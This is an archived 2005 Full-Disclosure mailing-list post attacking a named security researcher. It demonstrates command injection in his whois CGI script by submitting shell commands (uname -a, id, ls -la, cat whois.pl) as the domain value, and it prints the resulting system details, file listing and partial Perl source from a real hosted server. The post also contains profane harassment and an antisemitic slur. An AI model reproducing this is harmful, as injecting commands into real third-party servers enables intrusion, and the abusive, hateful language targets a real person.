[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability

To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability
From: Joxean Koret <joxeankoret@xxxxxxxxx>
Date: Wed, 3 Aug 2005 14:22:36 +0200

SHUT THE FUCK UP!!! AND FIX YOUR F%$CK1NG WEBSITE!!!  WE ARE ALL SICK
OF YOUR BORING E-MAILS!!!! MO/A%SDRF!CKER!


http://thor.prohosting.com/fgont/cgi-bin/whois.pl

whois for domain: uname -a

FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3
#0: Fri Nov  5 10:49:09 MST 2004
jblack@xxxxxxxxxxxxxxxxxxx:/usr/obj/usr/src/sys/LOCAL  i386


and whois for domain: id


uid=59286(u0638237) gid=1000(user) groups=1000(user)


and for ls -la

  whois ls -la
total 124
dr-xr-xr-x  2 u0638237  2000    512 Dec 28  2003 .
drwxr-xr-x  6 u0638237  2000    512 Jul 21 04:35 ..
-rwxr-xr-x  1 u0638237  2000  15091 Jul 30  2003 cgi-lib.pl
-rwxr-xr-x  1 u0638237  2000    621 Jun 24  2003 cli.pl
-rwxr-xr-x  1 u0638237  2000    993 Jul 30  2003 dig.pl
-rwxr-xr-x  1 u0638237  2000   4388 Dec 28  2003 fuente.cgi
-r--r--r--  1 u0638237  2000    552 Jun 25  2003 p1.txt
-r--r--r--  1 u0638237  2000    549 Jul  7  2003 p1dig.txt
-r--r--r--  1 u0638237  2000    556 Jul  7  2003 p1host.txt
-r--r--r--  1 u0638237  2000    577 Jul  7  2003 p1ns.txt
-r-xr-xr-x  1 u0638237  2000    562 Dec 28  2003 p1whois.txt
-r--r--r--  1 u0638237  2000    192 Jun 25  2003 p2.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2dig.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2host.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2ns.txt
-rwxrwxrwx  1 u0638237  2000    192 Dec 27  2003 p2whois.txt
-rwxr-xr-x  1 u0638237  2000  10171 Dec 28  2003 whois.cgi
-rwxr-xr-x  1 u0638237  2000    842 Dec 28  2003 whois.pl


BREAKING NEWS... for registrants of domain cat whois.pl

  whois cat whois.pl
#!/usr/local/bin/perl

       require('cgi-lib.pl');
       &ReadParse;

       $p1="p1whois.txt";
       $p2="p2whois.txt";

       print "Content-type: text/html\r\n\r\n";
       $string = $in{'direccion'};

       $_ = $string;
       $string=~ s/\>//g;
.....

$cmd ----->> YOU FUCKING JEW!!!!!!!!!!!

  "; open(p2); while($linea=){ print "$linea"; } close(p2);


Turkey hunters, inc

 "knock, knock, Neo follow the white turkey!!"

"Fernando Gont" <fernando@xxxxxxxxxxxxxx>
> Folks,
>
> My posts to this list have tried to show how easy it is to perform ICMP
> attacks against TCP.
>
> The attacks are blind, so the attacker does not need to be a "man in the
> middle" to perform then. The typical number of packets required to perform
> any of these attacks is about 16000 (in many cases, the attacker requires
> fewer packets). This means that even when a 128kbps link, it will take the
> attacker much less than a minute to perform them.
.....

> Fernando Gont
> e-mail: fernando@xxxxxxxxxxx || fgont@xxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability
Next by Date: Re: [Full-disclosure] Cisco IOS Shellcode Presentation
Previous by thread: Re: [Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability
Next by thread: [Full-disclosure] taking their revenge @ cisco
Index(es):
- Date
- Thread